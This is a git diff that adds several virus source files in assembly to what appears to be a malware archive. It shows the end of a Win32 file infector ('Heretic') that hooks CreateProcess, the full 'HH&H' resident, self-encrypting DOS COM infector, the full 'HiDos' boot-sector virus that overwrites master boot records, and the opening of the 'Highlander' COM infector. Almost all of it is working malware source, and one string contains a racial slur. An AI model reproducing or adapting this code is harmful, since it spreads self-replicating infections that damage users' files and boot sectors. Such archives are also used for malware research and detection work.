;no fix-up required + cmp al,' ' ;' ' or \0 is our terminator + jz hookInfectParsed + or al,al + jnz hookInfectParse + .endif + +hookInfectParsed: + mov byte ptr [esi-1],NULL ;null terminate string + + lea eax,[ebp+infectEXE] ;we're infecting a non-kernel32 executable + mov [edi+vir_str.lpInfectMethod],eax + call infect + + call [ebp+GlobalFree], \ ;deallocate global structure + edi +hookInfectErrorFree: + call [ebp+GlobalFree] ;deallocate lpFileName +hookInfectError: + ret + +hookCreateProcessW: + push CRC_POLY +CreateProcessW = dword ptr $ - 4 + +hookUnicode: + pushfd + pushad + call hookInfectUnicode + popad + popfd + ret + +hookCreateProcessA: + push CRC_POLY +CreateProcessA = dword ptr $ - 4 + +hookAnsi: + pushfd + pushad + call hookInfectAnsi + popad + popfd + ret + +className db '[Heretic] by Memory Lapse',0 +message db 'For my thug niggaz.. uptown baby, uptown.',0 + +szKernel db '\KERNEL32.DLL',0 + +szImageHlp db 'IMAGEHLP',0 +szChecksumMappedFile db 'CheckSumMappedFile',0 +szSetupApi db 'SETUPAPI',0 +szSetupInstallFileExA db 'SetupInstallFileExA',0 + +szWinInitFile db 'WININIT.INI',0 +szAppName db 'Rename',0 +szKeyName db 'NUL',0 + +name_ptr_api: +ddCloseHandle: crc +ddCopyFileA: crc +ddCreateFileA: crc +ddCreateFileMappingA: crc +ddDeleteFileA: crc +ddFreeLibrary: crc +ddGetFileAttributesA: crc +ddGetFileTime: crc +ddGetProcAddress: crc +ddGetSystemDirectoryA: crc +ddGetWindowsDirectoryA: crc +ddGlobalAlloc: crc +ddGlobalFree: crc +ddIsBadCodePtr: crc +ddLoadLibraryA: crc +ddMapViewOfFile: crc +ddSetFileAttributesA: crc +ddSetFileTime: crc +ddUnmapViewOfFile: crc +ddWideCharToMultiByte: crc +ddWritePrivateProfileStringA: crc +ddlstrcatA: crc +ddlstrcpyA: crc +ddlstrlenA: crc +name_ptr_api_end: + +; absolute offsets of desired API +CloseHandle dd 0 +CopyFileA dd 0 +CreateFileA dd 0 +CreateFileMappingA dd 0 +DeleteFileA dd 0 +FreeLibrary dd 0 +GetFileAttributesA dd 0 +GetFileTime dd 0 +GetProcAddress dd 0 +GetSystemDirectoryA dd 0 +GetWindowsDirectoryA dd 0 +GlobalAlloc dd 0 +GlobalFree dd 0 +IsBadCodePtr dd 0 +LoadLibraryA dd 0 +MapViewOfFile dd 0 +SetFileAttributesA dd 0 +SetFileTime dd 0 +UnmapViewOfFile dd 0 +WideCharToMultiByte dd 0 +WritePrivateProfileStringA dd 0 +lstrcatA dd 0 +lstrcpyA dd 0 +lstrlenA dd 0 + +_end: + +host: call MessageBoxA, \ + NULL, \ + L offset lpText, \ + L offset lpCaption, \ + L 0 ;MB_OK + + call ExitProcess, \ + L 0 + +.data +lpCaption db 'Memory Lapse has something to say..',0 +lpText db 'Hello World!',0 + +end start + diff --git a/MSDOS/Virus.MSDOS.Unknown.hh&h.asm b/MSDOS/Virus.MSDOS.Unknown.hh&h.asm new file mode 100644 index 00000000..f9e10f4a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hh&h.asm @@ -0,0 +1,901 @@ +CODE segment para public 'code' + assume cs:code,ds:code,es:nothing,ss:nothing + + org 100h + +egy equ 1 ; one +dma equ 0b0h +atvar equ 300 ; at paramaeter +xtvar equ 1 ; xt parameter +suruseg equ 255 ; density +idotartalek equ 18*30 ; time delay + +start: db 0e9h,0,0 +;##################### Initialization ###################### +resid: push ax + mov cx,offset memory - offset begin ;#### decoding #### + mov bx,ds:[101h] + add bx,103h+(offset begin-offset resid) +jhg1: xor byte ptr [bx],0 + inc bx + loop jhg1 + +begin: sub bx,(offset begin-offset resid)+(offset memory - offset begin) + mov cs:[0feh],bx + mov ax,[bx+(offset eltarol-offset resid)] + mov cl,[bx+(offset eltarol-offset resid)+2] + mov ds:[100h],ax + mov ds:[102h],cl + mov cx,0b800h + mov ah,15 + push bx + int 10h + pop bx + cmp al,7 + jne rety + mov ch,0b0h +rety: mov [bx+(offset ruut - offset resid)+1],cx + mov word ptr [bx+(offset counter-offset resid)],idotartalek + mov byte ptr [bx+(offset jammed-offset resid)+1],al + mov byte ptr [bx+(offset vanesik-offset resid)],0 + xor ax,ax + mov ds,ax + cmp word ptr ds:[130h],4142h + je zipp + mov ds:[130h],4142h + mov ax,cs + dec ax + mov ds,ax + mov ax,ds:[3] + sub ax,180h + mov ds:[3],ax + add ax,ds:[1] + mov es,ax + push cs + pop ds + sub word ptr ds:[2],384 + mov di,3 + mov si,bx + mov cx,(offset memory-offset resid) shr 1 +1 + cld + rep movsw + mov ax,es + sub ax,10h + mov ds,ax + mov dx,offset irq + mov ax,251ch + int 21h + mov ah,2ah + int 21h + cmp al,1 + jne zipp + dec al + out 0a0h,al + mov al,dma + out 41h,al +zipp: + mov ax,cs + mov ds,ax + mov es,ax + pop ax + push cs + mov cx,100h + push cx + mov cx,ds:[0feh] + sub cx,100h + retf +eltarol dw 20cdh +eltarol2 db 90h + +;######################### Vyrus activated ########################## +csik: mov ax,0e000h + mov ds,ax +csiky: mov ds:[0],al + inc al + jmp csiky + +;######################### propagation part ########################## + +eredeti: db 0eah ; original +int211 dw 0 +int212 dw 0 +counter dw 0 +szaporodas: cmp ah,4bh + jne eredeti + or al,al + jnz eredeti + push ax + push es + push bx + push ds + push dx + mov bx,dx +koj: inc bx + cmp byte ptr [bx],'.' + jne koj + cmp byte ptr[bx+1],'C' + jne kiugras1 + mov cs:kds,ds + mov cs:kdx,dx + mov cs:kbx,bx + call probe +kiugras1: pop dx + pop ds + pop bx + pop es + pop ax + jmp eredeti +kds dw 0 +kdx dw 0 +kbx dw 0 +kkk dw 0 +fszam dw 0 +probe: push cs + pop es + mov di,offset memory + mov si,dx + mov cx,40 + cld + rep movsw + mov bx,0ff0h + mov ah,48h + int 21h + jnc juk1 + ret + ;!!!!! memoria lefoglalva (kkk = Seg) +atr dw 0 +juk1: mov cs:kkk,ax + mov dx,offset memory + push ds + pop es + mov bx,cs:kbx + mov byte ptr [bx+1],'A' ; + call elorutin + push cs + pop ds ;DS:DX a masolt nev. + mov ax,4300h + int 21h + mov atr,cx + xor cx,cx + mov ax,4301h + int 21h + ;!!!!! Attr allitas + cmp cs:attrflag,0 + jz juk2 + mov ds,cs:kds + jmp memoff +juk2: mov di,kdx ;ES:DI a regi nev atirva + mov ah,56h + int 21h + call utorutin ;!!!!! Atnevezve + mov dx,cs:kdx + push es + pop ds + mov ax,3d02h + int 21h ;!!!!! File megnyitva + mov cs:fszam,ax + mov ds,cs:kkk + xor dx,dx + mov bx,ax + mov cx,0fc00h-(offset memory-offset resid) + mov ah,3fh + int 21h + cmp ax,0fc00h-(offset memory-offset resid) + ;!!!!! Beolvasva a program (csak a hossza miatt) + je hosszu ;zarjuk le a file-t + cmp ax,7580 + jb hosszu ;tul rovid a file + mov di,ax + + mov bx,ds:[1] + cmp word ptr [bx+3],0b950h + +;$$$$$$$$$$$$$$$$$$$$$$$$$ FUCK OFF TASM,MASM $$$$$$$$$$$$$$$$$$$$$$$$$$$ + + je hosszu + push di + mov cx,(offset memory-offset resid) + mov si,offset resid + push ds + pop es + push cs + pop ds + inc byte ptr ds:[offset jhg1 +2] + mov ax,es:[0] + mov eltarol,ax + mov al,es:[2] + mov eltarol2,al + rep movsw ;!!!!! Atmasolva (hehe) + mov al,byte ptr ds:[offset jhg1 +2] + pop di + add di,(offset begin-offset resid) + mov cx,offset memory - offset begin ;#### coding #### +jhga: xor byte ptr es:[di],al + inc di + loop jhga + sub di,(offset memory - offset resid) + push di ;Az ugrasi hely + mov bx,fszam + mov cx,offset memory - offset begin + mov dx,di + push es + pop ds + mov ah,40h + int 21h + pop di + cmp ax,offset memory - offset begin + je ghj1 +hosszu: jmp zardle +ghj1: ;!!!!! Kiirva a vege + mov byte ptr ds:[0],0e9h + sub di,3 + mov ds:[1],di + mov bx,cs:fszam + xor cx,cx + xor dx,dx + mov ax,4200h + push bx + int 21h + pop bx + mov cx,3 + xor dx,dx + mov ah,40h + int 21h +zardle: mov bx,cs:fszam + mov ah,3eh + int 21h ;!!!!! File lezarva + push cs + pop es + mov di,offset memory + mov ds,cs:kds + mov dx,cs:kdx + mov ah,56h + int 21h ;!!!!! File visszanevezve + mov bx,cs:kbx + mov byte ptr ds:[bx+1],'C' + mov ax,4301h + mov cx,cs:atr + int 21h ;!!!!! attr visszaall +memoff: mov bx,cs:kbx + mov byte ptr ds:[bx+1],'C' + push cs + pop ds + mov es,cs:kkk + mov ah,49h + int 21h ;!!!!! Memoria visszaalt + ret +it241 dw 0 +it242 dw 0 +attrflag db 0 + +elorutin: mov cs:attrflag,0 + xor ax,ax + mov ds,ax + mov ax,ds:[90h] + mov cs:it241,ax + mov ax,ds:[92h] + mov cs:it242,ax + mov ds:[90h],offset it24 + mov ds:[92h],cs + ret + +utorutin: xor ax,ax + mov ds,ax + mov ax,cs:it241 + mov ds:[90h],ax + mov ax,cs:it242 + mov ds:[92h],ax + ret +it24: mov cs:attrflag,1 + xor al,al + iret +vanesik db 0 +irq: cli + push ds + push es + push ax + push bx + push cx + push dx + push si + push di + cmp cs:counter,0 + je sabad + dec cs:counter + jne sabad + xor ax,ax + mov ds,ax + mov ax,ds:[84h] + mov cs:int211,ax + mov ax,ds:[86h] + mov cs:int212,ax + mov ds:[84h],offset szaporodas + mov ds:[86h],cs +sabad: cmp cs:vanesik,0 + je keress + call idovan + jmp jumper +keress: call ruut +jumper: pop di + pop si + pop dx + pop cx + pop bx + pop ax + pop es + pop ds + iret + +idovan: xor ah,ah + int 1ah + and dx,suruseg + jne rutyi + call action +rutyi: ret + + +ruut: mov ax,0b800h + mov es,ax + mov di,cs:did + mov cx,512 + cld +poke: jcxz huy + mov al,'E' + repnz scasb + jz talalt +huy: cmp di,4095 + jb kisebb + mov cs:did,0 + ret +kisebb: add cs:did,512 + ret +did dw 0 +talalt: test di,1 + jz poke + mov dl,es:[di+1] + mov dh,es:[di+3] + or dx,2020h + cmp dx,6973h ;'is' + jne poke + mov bl,es:[di+5] + or bl,20h + cmp bl,'k' + jne poke + mov cs:vanesik,1 + jmp huy +action: mov ax,cs + mov ds,ax + mov es,ax + mov vanesik,0 + mov pontszam,1 + mov si,offset zizi + mov di,offset novi + cld + mov cx,6 + rep movsw + call zoldseg +jammed: mov ax,3 + int 10h + cmp counterr,atvar + jne fdr + push cs + pop es + lea bx,mess + mov ax,1301h + mov bx,1 + xor dx,dx + mov cx,offset drt-offset mess + int 10h +fdr: ret + +counterr dw 0 +zoldseg: cli + mov di,offset memory + xor ax,ax + cld + mov cx,200*3 + rep stosw + mov ah,0c0h + mov si,3333h + int 15h + cmp si,3333h + mov ax,xtvar + je xt + mov ax,atvar +xt: mov counterr,ax + mov ax,3502h + int 21h + cmp bx,0e9eh + jne ibm + call init1 + mov pontm,100 + mov port,22h + jmp entry +ibm: ;Ibm bulik + mov pontm,200 + mov al,70h + mov port,60h ;% + mov ah,15 + int 10h + cmp al,7 + jne cga + call init3 + jmp entry +cga: call init2 + jmp entry +port dw 22h +pontm dw 100 + +init1: mov ax,200h + mov es,ax + xor di,di + mov cx,4000h + cld + xor ax,ax + rep stosw + mov plotdw,offset plot + mov unplotdw,offset unplot + ret +init2: mov ax,0b800h + mov es,ax + mov ax,6 + int 10h + mov plotdw,offset plotcga + mov unplotdw,offset unplotcga + ret +init3: mov ax,0b000h + mov es,ax + call prog + mov plotdw,offset plotherc + mov unplotdw,offset unplotcga + ret +prog: mov dx,3bfh + mov al,3 + out dx,al + mov al,28h + mov dx,3b8h + out dx,al + mov ah,0 + mov cx,12 + lea bx,ports +lopi1: mov dx,03b4h + mov al,ah + out dx,al + inc ah + mov dx,03b5h + mov al,[bx] + out dx,al + inc bx + loop lopi1 + + mov dx,3bfh + mov al,3 + out dx,al + mov dx,3b8h + mov al,0ah + out dx,al + xor di,di + mov cx,4000h + xor ax,ax + cld + rep stosw + ret + +ports db 35h,2dh,2eh,7,5bh,2,57h,57h,2,3,0,0 + +;**************************** Forgatorutin ************************************ + + even +sina dw 0 +cosa dw 0 ;si-t meghagyja +sinb dw 0 +cosb dw 0 +pontszam dw 1 +transzform: ;be: di=X, bx=Y, cx=Z, SINA,COSA,SINB,COSB +; add bx,ytol ;ez itt jolesz + shl di,1 + shl bx,1 ;X es Y elokeszitese a szorzashoz + mov ax,di + imul cosa + mov bp,dx + mov ax,bx + imul sina + add bp,dx ; bp=X' = cosa*X + sina*Y + mov ax,bx + imul cosa + mov bx,dx + mov ax,di + imul sina + sub bx,dx ; bx=Y' = cosa*X - sina*Y + shl bp,1 + shl cx,1 ;X' es Z elokeszitese + mov ax,bp + imul cosb + mov di,dx + mov ax,cx + imul sinb + sub di,dx ; di=X'' = cosb*X' - sinb*Z + mov cx,di + mov ax,bx + ret + +comment @ + mov ax,cx + imul cosb + mov cx,dx + mov ax,bp + imul sinb + add cx,dx ; cx=Z'' = cosb*Z = sinb*X' + + ; out: di=X'' bx=Y'' cx=Z'' + mov dx,keptav +;****************************** PERSPEKTIVA ********************************** + mov ax,di + shl ax,1 + imul tavol + mov cx,dx + mov ax,bx + shl ax,1 + imul tavol + mov ax,dx + ret ; ki : CX=X' AX=Y' + +@ + +plotherc: ; al=y cx=x + xor ah,ah + mov dx,ax + shr dx,1 + add ax,dx + mov dx,cx + mov cl,al + and cl,3 + shr ax,1 + shr al,1 + mov di,2000h + shl di,cl + mov cl,90 + mul cl + add di,ax + mov ax,dx + mov cx,dx + jmp ezisi +plotcga: xor di,di + shr ax,1 + jnc tryp + mov di,2000h +tryp: mov dl,80 + mul dl + add di,ax + mov ax,cx +ezisi: shr ax,1 + shr ax,1 + shr ax,1 + add di,ax + and cl,7 + mov al,128 + shr al,cl + or es:[di],al + jmp ezis1 + +unplotcga: mov al,[bx] + mov di,[bx+1] + xor al,255 + and es:[di],al + ret + +plot: ;AL = y koord. cx = x koord. + mov dl,160 + mul dl + mov di,ax + mov ax,cx + shr ax,1 + shr ax,1 + add di,ax + and di,-2 + and cl,7 + mov al,128 + shr al,cl + or es:[di+egy],al +ezis1: mov [bx],al + inc bx + mov [bx],di + add bx,2 + ret +unplot: mov al,[bx] + mov di,[bx+1] + xor al,255 + and es:[di+egy],al + ret +kezdfazisrajz: mov bx,offset memory + mov si,offset gombdata + mov cx,pontszam +ck1: push cx + lodsw + mov cx,ax + shl cx,1 + add cx,320 + lodsw + add si,2 + add ax,50 + call word ptr [plotdw] + pop cx + loop ck1 + ret +indy db 0 + +fazisrajz: mov bx,offset memory + mov si,offset gombdata + mov cx,pontszam + mov indy,1 +ck12: push cx + call word ptr [unplotdw] + push bx + lodsw + mov di,ax + lodsw + mov bx,ax + lodsw + mov cx,ax + call transzform + pop bx + add ax,50 + mov di,bxpo + add al,[di] + shl cx,1 + add cx,bxpo2 + cmp indy,0 + je ruty + mov indy,0 + cmp karal2,0 + jne ruty + push cx + push ax + inc cx + call word ptr [plotdw] + pop ax + pop cx + sub bx,3 +ruty: call word ptr [plotdw] + pop cx + loop ck12 + ret + +novpont: mov ax,pontm + cmp pontszam,ax + je trew + mov cx,pontm + sub cx,pontszam + mov ch,cl + shR cx,1 + shr cx,1 +yut: loop yut + inc pontszam + ret +trew: call movie + mov bx,bxpo + cmp bx,offset patt + je valto + cmp bx,offset patt+29 + je valto +iuy: add bx,novi + mov bxpo,bx + ret +valto: neg novi + jmp iuy +novi dw -1 +bxpo dw offset patt +bxpo2 dw 320 +novi2 dw 4 +karal dw 300 +karal2 dw 600 +zizi dw -1,offset patt,320,4,300,600 +movie: cmp karal,0 + je jesty + dec karal + ret +jesty: cmp karal2,0 + je jesty2 + dec karal2 +jesty2: mov bx,bxpo2 + cmp bx,100 + je valto2 + cmp bx,540 + je valto2 +iuy2: add bx,novi2 + mov bxpo2,bx + ret +valto2: neg novi2 + jmp iuy2 +elokesz: call novpont + mov bl,szogx + xor bh,bh + shl bx,1 + mov ax,sintabl[bx] + mov sina,ax + mov ax,costabl[bx] + mov cosa,ax + mov bl,szogy + xor bh,bh + shl bx,1 + mov ax,sintabl[bx] + mov sinb,ax + mov ax,costabl[bx] + mov cosb,ax + mov al,szogxvalt + add szogx,al + mov al,szogyvalt + add szogy,al + ret + even +szogx db 0 +szogy db 0 +szogxvalt db 2 +szogyvalt db 5 +tavol dw 32767 + +phase: call elokesz + call fazisrajz + ret +entry: call kezdfazisrajz +rajta1: call phase + cmp pontm,100 + je apc + cmp byte ptr ds:[offset ruut +2],0b8h + je ccggaa + mov cx,counterr + mov dx,3bah +qaz1: in al,dx + and al,1 + jnz qaz1 +qaz2: in al,dx + and al,1 + jz qaz2 + loop qaz1 + jmp apc +ccggaa: mov dx,3dah +qaz3: in al,dx + and al,8 + jnz qaz3 +qaz4: in al,dx + and al,8 + jz qaz4 +apc: mov dx,port + in al,dx + and al,1 + jz rajta1 + ret + even +plotdw dw 0 +unplotdw dw 0 + +sintabl dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602, 6393 + dw 7179, 7962, 8739, 9512, 10278, 11039, 11793, 12539, 13279 + dw 14010, 14732, 15446, 16151, 16846, 17530, 18204, 18868, 19519 + dw 20159, 20787, 21403, 22005, 22594, 23170, 23731, 24279, 24811 + dw 25329, 25832, 26319, 26790, 27245, 27683, 28105, 28510, 28898 + dw 29268, 29621, 29956, 30273, 30571, 30852, 31113, 31356, 31580 + dw 31785, 31971, 32137, 32285, 32412, 32521, 32609, 32678, 32728 + dw 32757, 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285 + dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571, 30273 + dw 29956, 29621, 29268, 28898, 28510, 28105, 27683, 27245, 26790 + dw 26319, 25832, 25329, 24811, 24279, 23731, 23170, 22594, 22005 + dw 21403, 20787, 20159, 19519, 18868, 18204, 17530, 16846, 16151 + dw 15446, 14732, 14010, 13279, 12539, 11793, 11039, 10278, 9512 + dw 8739, 7962, 7179, 6393, 5602, 4808, 4011, 3212, 2410 + dw 1608, 804, 0, -804, -1608, -2410, -3212, -4011, -4808 + dw -5602, -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793 + dw -12539,-13279,-14010,-14732,-15446,-16151,-16846,-17530,-18204 + dw -18868,-19519,-20159,-20787,-21403,-22005,-22594,-23170,-23731 + dw -24279,-24811,-25329,-25832,-26319,-26790,-27245,-27683,-28105 + dw -28510,-28898,-29268,-29621,-29956,-30273,-30571,-30852,-31113 + dw -31356,-31580,-31785,-31971,-32137,-32285,-32412,-32521,-32609 + dw -32678,-32728,-32757,-32767,-32757,-32728,-32678,-32609,-32521 + dw -32412,-32285,-32137,-31971,-31785,-31580,-31356,-31113,-30852 + dw -30571,-30273,-29956,-29621,-29268,-28898,-28510,-28105,-27683 + dw -27245,-26790,-26319,-25832,-25329,-24811,-24279,-23731,-23170 + dw -22594,-22005,-21403,-20787,-20159,-19519,-18868,-18204,-17530 + dw -16846,-16151,-15446,-14732,-14010,-13279,-12539,-11793,-11039 + dw -10278, -9512, -8739, -7962, -7179, -6393, -5602, -4808, -4011 + dw -3212, -2410, -1608, -804 +costabl dw 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285 + dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571 + dw 30273, 29956, 29621, 29268, 28898, 28510, 28105, 27683 + dw 27245, 26790, 26319, 25832, 25329, 24811, 24279, 23731 + dw 23170, 22594, 22005, 21403, 20787, 20159, 19519, 18868 + dw 18204, 17530, 16846, 16151, 15446, 14732, 14010, 13279 + dw 12539, 11793, 11039, 10278, 9512, 8739, 7962, 7179 + dw 6393, 5602, 4808, 4011, 3212, 2410, 1608, 804 + dw 0, -804, -1608, -2410, -3212, -4011, -4808, -5602 + dw -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793 + dw -12539, -13279,-14010,-14732,-15446,-16151,-16846,-17530 + dw -18204, -18868,-19519,-20159,-20787,-21403,-22005,-22594 + dw -23170, -23731,-24279,-24811,-25329,-25832,-26319,-26790 + dw -27245, -27683,-28105,-28510,-28898,-29268,-29621,-29956 + dw -30273, -30571,-30852,-31113,-31356,-31580,-31785,-31971 + dw -32137, -32285,-32412,-32521,-32609,-32678,-32728,-32757 + dw -32767, -32757,-32728,-32678,-32609,-32521,-32412,-32285 + dw -32137, -31971,-31785,-31580,-31356,-31113,-30852,-30571 + dw -30273, -29956,-29621,-29268,-28898,-28510,-28105,-27683 + dw -27245, -26790,-26319,-25832,-25329,-24811,-24279,-23731 + dw -23170, -22594,-22005,-21403,-20787,-20159,-19519,-18868 + dw -18204, -17530,-16846,-16151,-15446,-14732,-14010,-13279 + dw -12539, -11793,-11039,-10278, -9512, -8739, -7962, -7179 + dw -6393, -5602, -4808, -4011, -3212, -2410, -1608, -804 + dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602 + dw 6393, 7179, 7962, 8739, 9512, 10278, 11039, 11793 + dw 12539, 13279, 14010, 14732, 15446, 16151, 16846, 17530 + dw 18204, 18868, 19519, 20159, 20787, 21403, 22005, 22594 + dw 23170, 23731, 24279, 24811, 25329, 25832, 26319, 26790 + dw 27245, 27683, 28105, 28510, 28898, 29268, 29621, 29956 + dw 30273, 30571, 30852, 31113, 31356, 31580, 31785, 31971 + dw 32137, 32285, 32412, 32521, 32609, 32678, 32728, 32757 +gombdata: + DW 44, 3, 22, 29, 6, 40, 7, 9, 48,-14, 12, 46 + DW -33, 15, 33,-44, 18, 14,-44, 21, -7,-35, 24,-25 + DW -19, 26,-37, 0, 29,-40, 17, 31,-34, 29, 34,-21 + DW 33, 36, -5, 30, 38, 9, 20, 40, 20, 8, 42, 25 + DW -3, 43, 23,-12, 45, 17,-16, 46, 8,-15, 47, 0 + DW -11, 48, -5, -5, 49, -7, 0, 49, -6, 0, 49, -2 + DW 0, 49, 0, -2, 49, 0, -6, 49, 0, -7, 49, -5 + DW -5, 48,-11, 0, 47,-15, 8, 46,-16, 17, 45,-12 + DW 23, 43, -3, 25, 42, 8, 20, 40, 20, 9, 38, 30 + DW -5, 36, 33,-21, 34, 29,-34, 31, 17,-40, 29, 0 + DW -37,26,-19,-25,24,-35,-7,21,-44,14,18,-44 + DW 33,15,-33,46,12,-14,48,9,7,40,6,29 + DW 22,3,44,0,0,49,-22,-3,44,-40,-6,29 + DW -48,-9,7,-46,-12,-14,-33,-15,-33,-14,-18,-44 + DW 7,-21,-44,25,-24,-35,37,-26,-19,40,-29,0 + DW 34,-31,17,21,-34,29,5,-36,33,-9,-38,30 + DW -20,-40,20,-25,-42,8,-23,-43,-3,-17,-45,-12 + DW -8,-46,-16,0,-47,-15,5,-48,-11,7,-49,-5 + DW 6,-49,0,2,-49,0,0,-49,0,0,-49,-2 + DW 0,-49,-6,5,-49,-7,11,-48,-5,15,-47,0 + DW 16,-46,8,12,-45,17,3,-43,23,-8,-42,25 + DW -20,-40,20,-30,-38,9,-33,-36,-5,-29,-34,-21 + DW -17,-31,-34,0,-29,-40,19,-26,-37,35,-24,-25 + DW 44,-21,-7,44,-18,14,33,-15,33,14,-12,46 + DW -7,-9,48,-29,-6,40,-44,-3,22,-49,0,0 + DW -44,3,-22,-29,6,-40,-7,9,-48,14,12,-46 + DW 33,15,-33,44,18,-14,44,21,7,35,24,25 + DW 19,26,37,0,29,40,-17,31,34,-29,34,21 + DW -33,36,5,-30,38,-9,-20,40,-20,-8,42,-25 + DW 3,43,-23,12,45,-17,16,46,-8,15,47,0 + DW 11,48,5,5,49,7,0,49,6,0,49,2 + DW 0,49,0,2,49,0,6,49,0,7,49,5 + DW 5,48,11,0,47,15,-8,46,16,-17,45,12 + DW -23,43,3,-25,42,-8,-20,40,-20,-9,38,-30 + DW 5,36,-33,21,34,-29,34,31,-17,40,29,0 + DW 37,26,19,25,24,35,7,21,44,-14,18,44 + DW -33,15,33,-46,12,14,-48,9,-7,-40,6,-29 + DW -22,3,-44,0,0,-49,22,-3,-44,40,-6,-29 + DW 48,-9,-7,46,-12,14,33,-15,33,14,-18,44 + DW -7,-21,44,-25,-24,35,-37,-26,19,-40,-29,0 + DW -34,-31,-17,-21,-34,-29,-5,-36,-33,9,-38,-30 + DW 20,-40,-20,25,-42,-8,23,-43,3,17,-45,12 + DW 8,-46,16,0,-47,15,-5,-48,11,-7,-49,5 + DW -6,-49,0,-2,-49,0,0,-49,0,0,-49,2 + DW 0,-49,6,-5,-49,7,-11,-48,5,-15,-47,0 + DW -16,-46,-8,-12,-45,-17,-3,-43,-23,8,-42,-25 + DW 20,-40,-20,30,-38,-9,33,-36,5,29,-34,21 + DW 17,-31,34,0,-29,40,-19,-26,37,-35,-24,25 + DW -44,-21,7,-44,-18,-14,-33,-15,-33,-14,-12,-46 + DW 7,-9,-48,29,-6,-40,44,-3,-22,49,0,0 +patt: DB 0, 0, 0, 0, 0, 1, 1, 2, 4, 5, 7, 9,11,14,17,20,23,27 + db 31,35,40,45,50,56,61,67,73,80,86,93 + + + +mess db 'HARD HIT & HEAVY HATE the HUMANS !!' + db ' [ H.H.& H.H. the H. ] ' +drt dw 5 dup (0) +memory: + CODE ENDS + + END START + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.hidos.asm b/MSDOS/Virus.MSDOS.Unknown.hidos.asm new file mode 100644 index 00000000..1a9f5c56 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hidos.asm @@ -0,0 +1,213 @@ + NAME boot + PAGE 55,132 + TITLE FILE UTIL + + + + +code segment + + ASSUME CS:CODE,DS:CODE,ES:CODE + + org 100h + +main: jmp over + db '[' +id db 'HiDos]',0 +by db 'By Apache',0 +over: xor ax,ax + mov ds,ax + cli + mov ss,ax + mov sp,7c00h + sti + mov ax,ds:[004eh] + mov word ptr ds:[int13+7b02h],ax + mov ax,ds:[004ch] + mov word ptr ds:[int13+7b00h],ax + mov ax,ds:[0413h] + dec ax + dec ax + mov ds:[0413h],ax + mov cl,06h + shl ax,cl + mov es,ax + mov word ptr ds:[bigj+7b02h],es + mov ax,offset jumpt + mov word ptr ds:[bigj+7b00h],ax + mov cx,0400h + push cs + pop ds + mov si,7c00h + mov di,0100h + cld + repz + movsb + push cs + pop ds + jmp cs:[bigj+7b00h] + +jumpt: push cs + pop ds + mov si,offset drive + cmp byte ptr ds:[si],80h + jz hdone + mov bx,0300h + mov cx,0001h + mov dx,0080h + push cs + pop es + call hdread + cmp ds:[0304h],'iH' + jz hdone + mov bx,0300h + mov cx,0007h + mov dx,0080h + call hdwrit + mov si,04beh + mov di,02beh + mov cx,0042h + cld + repz + movsb + mov byte ptr ds:[drive],80h + mov bx,0100h + mov cx,0001h + mov dx,0080h + call hdwrit + mov byte ptr ds:[drive],00h + +hdone: xor ax,ax + mov word ptr cs:[boot+2],ax + mov es,ax + push cs + pop ds + mov ax,0201h + mov bx,7c00h + mov word ptr ds:[boot],bx + mov si,offset drive + cmp byte ptr ds:[si],80h + jz hload + mov cx,0003h + mov dx,0100h + jmp fload +hload: mov cx,0007h + mov dx,0080h +fload: mov di,'rv' + int 13h + mov si,offset drive + mov byte ptr cs:[si],00h + xor ax,ax + mov es,ax + mov ds,ax + mov ax,offset nint13 + mov ds:[004ch],ax + mov ds:[004eh],cs + push cs + pop ds + jmp cs:[boot] + +hdwrit: mov ax,0301h + mov di,'rv' + jmp xx4 +hdread: mov ax,0201h + mov di,'rv' +xx4: int 13h + ret + +nint13: cmp di,'rv' + jz iv13 + cmp ah,02h + jnz wcheck + cmp cl,01h + jnz wcheck + cmp dh,00h + jnz wcheck + cmp dl,80h + jz check1 + cmp dl,00h + jnz wcheck +check1: push ax + push bx + push cx + push dx + push ds + push es + push di + mov bx,0300h + push cs + pop es + call hdread + mov si,offset [id+0200h] + cmp es:[si],'iH' + jz redirect + jmp iflopd +redirect: cmp dl,80h + jnz rdirfl + pop di + pop es + pop ds + pop dx + pop cx + pop bx + pop ax + mov cx,0007h + jmp a13 + +rdirfl: pop di + pop es + pop ds + pop dx + pop cx + pop bx + pop ax + mov cx,0003h + mov dx,0100h +a13: mov ax,0201h +iv13: jmp v13 + + +wcheck: cmp ah,03h + jnz v13 + cmp dl,00h + jnz v13 + push ax + push bx + push cx + push dx + push ds + push es + push di + push cs + pop es + mov bx,0300h + mov cx,0001h + xor dx,dx + call hdread + mov si,offset [id+0200h] + cmp es:[si],'iH' + jz iflopd + mov cx,0003h + mov dx,0100h + mov bx,0300h + call hdwrit + mov bx,0100h + xor dx,dx + mov cx,0001h + call hdwrit +iflopd: pop di + pop es + pop ds + pop dx + pop cx + pop bx + pop ax +v13: db 0eah +int13 dd 0h +drive db 0h +bigj dd 0h +boot dd 0h + +code ends + +end main \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.highland.asm b/MSDOS/Virus.MSDOS.Unknown.highland.asm new file mode 100644 index 00000000..3f13c66b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.highland.asm @@ -0,0 +1,422 @@ +;HIGHLAND.COM + +;This is the HIGHLANDER Virus version 1.0. + +;This virus is a generic, parasitic, resident COM infector. It will not +;infect command.com however. It is not destructive but can be irritating. +;Interrupt 21 is hooked. + +;This virus is to be assembled under TASM 2.0 with the /m2 switch. + +;When an infected file is executed, the virus code is executed first. +;The virus first checks to see if the virus is already resident. It does +;this by setting the AH register to 0DEh. This subfunction is currently +;unsupported by DOS. Interrupt 21 is then called. If after the call, AH is +;unchanged, the virus is not resident. If AH no longer contains 0DEh, the +;virus is assumed to be resident (If the virus is resident, AH will actually +;be changed to 0EDh. This is never checked for, only a change from 0DEh +;is checked for). If the virus is already resident, the executing viral +;code will restore the host in memory to original condition and 